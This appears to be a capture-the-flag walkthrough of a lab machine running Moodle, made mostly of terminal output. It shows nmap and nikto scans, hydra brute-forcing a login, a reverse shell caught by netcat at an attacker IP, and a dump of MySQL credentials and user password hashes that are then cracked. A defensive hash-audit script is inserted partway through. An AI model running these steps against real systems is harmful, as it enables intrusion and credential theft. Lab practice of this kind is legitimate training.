λ nmap -sV -A -Pn -T4 10.10.10.153
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-22 13:08 中国标准时间
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 56.13% done; ETC: 13:08 (0:00:04 remaining)
Stats: 0:00:35 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
Traceroute Timing: About 32.26% done; ETC: 13:08 (0:00:00 remaining)
Nmap scan report for 10.10.10.153
Host is up (0.23s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=3/22%OT=80%CT=1%CU=39891%PV=Y%DS=2%DC=T%G=Y%TM=5E76F2E
OS:3%P=i686-pc-windows-windows)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8
OS:)SEQ(CI=I%II=I)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54D
OS:ST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W
OS:5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y
OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   230.00 ms 10.10.14.1
2   232.00 ms 10.10.10.153

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.73 seconds
$ hydra -I -l giovanni -P pwd.txt 10.10.10.153 http-post-form "/moodle/login/index.php:username=^USER^&password=^PASS^:S=Set-Cookie"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-22 04:23:47
[DATA] max 16 tasks per 1 server, overall 16 tasks, 128 login tries (l:1/p:128), ~8 tries per task
[DATA] attacking http-post-form://10.10.10.153:80/moodle/login/index.php:username=^USER^&password=^PASS^:S=Set-Cookie
[80][http-post-form] host: 10.10.10.153   login: giovanni   password: Th4C00lTheacha#
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-22 04:23:58
$ nikto -host http://10.10.10.153/moodle
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.153
+ Target Hostname:    10.10.10.153
+ Target Port:        80
+ Start Time:         2020-03-22 02:49:41 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.25 (Debian)
+ Cookie MoodleSession created without the httponly flag
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'content-script-type' found, with contents: text/javascript
+ Uncommon header 'content-style-type' found, with contents: text/css
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /moodle/config.php: PHP Config file may contain database IDs and passwords.
+ Uncommon header 'x-accel-buffering' found, with contents: no
+ OSVDB-3092: /moodle/auth/: This might be interesting...
+ OSVDB-3268: /moodle/backup/: Directory indexing found.
+ OSVDB-3092: /moodle/backup/: This might be interesting...
+ OSVDB-3268: /moodle/install/: Directory indexing found.
+ OSVDB-3092: /moodle/install/: This might be interesting...
+ OSVDB-3092: /moodle/lib/: This might be interesting...
+ OSVDB-3092: /moodle/login/: This might be interesting...
+ OSVDB-3268: /moodle/pix/: Directory indexing found.
+ OSVDB-3092: /moodle/pix/: This might be interesting...
+ OSVDB-3092: /moodle/INSTALL.txt: Default file found.
+ OSVDB-3268: /moodle/repository/: Directory indexing found.
+ /moodle/repository/: CRX WebDAV upload
+ /moodle/composer.json: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ /moodle/composer.lock: PHP Composer configuration file reveals configuration information - https://getcomposer.org/
+ /moodle/package.json: Node.js package file found. It may contain sensitive information.
+ 7871 requests: 0 error(s) and 26 item(s) reported on remote host
+ End Time:           2020-03-22 03:27:50 (GMT-4) (2289 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[>] You should receive a reverse shell attempt from the target at 10.10.16.89 on port 4444
[>] If connection was successful this program will wait here until you close the connection.
[>] You should be able to Ctrl+C and retain the connection through netcat.
Listen on port 4444 on the local machine:
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.10.153: inverse host lookup failed: Unknown host
connect to [10.10.16.89] from (UNKNOWN) [10.10.10.153] 42232
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@teacher:/var/www/html/moodle/question$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
The MySQL database login username and password are listed here: root and Welkom1!
www-data@teacher:/var/www/moodledata$ mysql -u root -p
mysql -u root -p
Enter password: Welkom1!
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 949
Server version: 10.1.26-MariaDB-0+deb9u1 Debian 9.1

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
......
MariaDB [moodle]> select username, password from mdl_user;
select username, password from mdl_user;
+-------------+--------------------------------------------------------------+
| username    | password                                                     |
+-------------+--------------------------------------------------------------+
| guest       | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin       | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni    | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af                             |
+-------------+--------------------------------------------------------------+
4 rows in set (0.00 sec)
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Look up (reverse) the MD5 hash 7a860966115182402ed06375cf0a22af:
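The mdl_user dump above mixes three bcrypt hashes with one bare MD5 value, which is the only one a lookup service can reverse. As an added defender-side example (not code from the original writeup or from Moodle), the script below audits rows in that format, flags the legacy hash, and confirms an MD5 lookup hit. The row data is copied from the dump above; the names MDL_USER_ROWS, classify_hash, audit_mdl_user and md5_matches are this example's own.

```python
import hashlib
import re

# Constructed sample: the four rows of the mdl_user dump shown in the writeup.
MDL_USER_ROWS = [
    ("guest", "$2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO"),
    ("admin", "$2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2"),
    ("giovanni", "$2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO"),
    ("Giovannibak", "7a860966115182402ed06375cf0a22af"),
]

# Moodle 2.5+ stores passwords via PHP password_hash(): bcrypt "$2y$<cost>$<22 salt + 31 hash>".
BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")
# Older Moodle stored MD5; a bare 32-hex value is the unsalted legacy form. Moodle only
# upgrades such a hash to bcrypt on the user's next successful login, so it can linger.
MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def classify_hash(stored):
    """Return (scheme, bcrypt_cost_or_None) for one mdl_user.password value."""
    m = BCRYPT_RE.match(stored)
    if m:
        return "bcrypt", int(m.group(1))
    if MD5_RE.match(stored.lower()):
        return "md5", None
    return "unknown", None


def audit_mdl_user(rows, min_cost=10):
    """Flag accounts whose stored hash is weak: legacy MD5, low bcrypt cost, or unrecognised."""
    findings = []
    for username, stored in rows:
        scheme, cost = classify_hash(stored)
        if scheme == "md5":
            findings.append((username, "legacy unsalted MD5; force a reset, the hash is trivially reversible"))
        elif scheme == "bcrypt" and cost < min_cost:
            findings.append((username, f"bcrypt cost {cost} is below the {min_cost} minimum"))
        elif scheme == "unknown":
            findings.append((username, "unrecognised hash format"))
    return findings


def md5_matches(stored, candidate):
    """True if an unsalted MD5 hash equals MD5(candidate); confirms a lookup-service hit offline."""
    return hashlib.md5(candidate.encode()).hexdigest() == stored.lower()


if __name__ == "__main__":
    for user, reason in audit_mdl_user(MDL_USER_ROWS):
        print(f"{user}: {reason}")
```

Running it reports only Giovannibak, the row whose hash the writeup reverses in the next step.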
www-data@teacher:/var/www/moodledata$ su giovanni
su giovanni
Password: expelled

giovanni@teacher:/var/www/moodledata$ id
id
uid=1000(giovanni) gid=1000(giovanni) groups=1000(giovanni)
giovanni@teacher:/var/www/moodledata$ ls /home/giovanni/
ls /home/giovanni/
user.txt  work

giovanni@teacher:~/work$ ls -lR
ls -lR
.:
total 8
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 courses
drwxr-xr-x 3 giovanni giovanni 4096 Jun 27  2018 tmp

./courses:
total 4
drwxr-xr-x 2 root root 4096 Jun 27  2018 algebra

./courses/algebra:
total 4
-rw-r--r-- 1 giovanni giovanni 109 Jun 27  2018 answersAlgebra

./tmp:
total 8
-rwxrwxrwx 1 root root  256 Mar 22 16:08 backup_courses.tar.gz
drwxrwxrwx 3 root root 4096 Jun 27  2018 courses

./tmp/courses:
total 4
drwxrwxrwx 2 root root 4096 Jun 27  2018 algebra

./tmp/courses/algebra:
total 4
-rwxrwxrwx 1 giovanni giovanni 109 Jun 27  2018 answersAlgebra
giovanni@teacher:~/work$ date
date
Sun Mar 22 16:08:17 CET 2020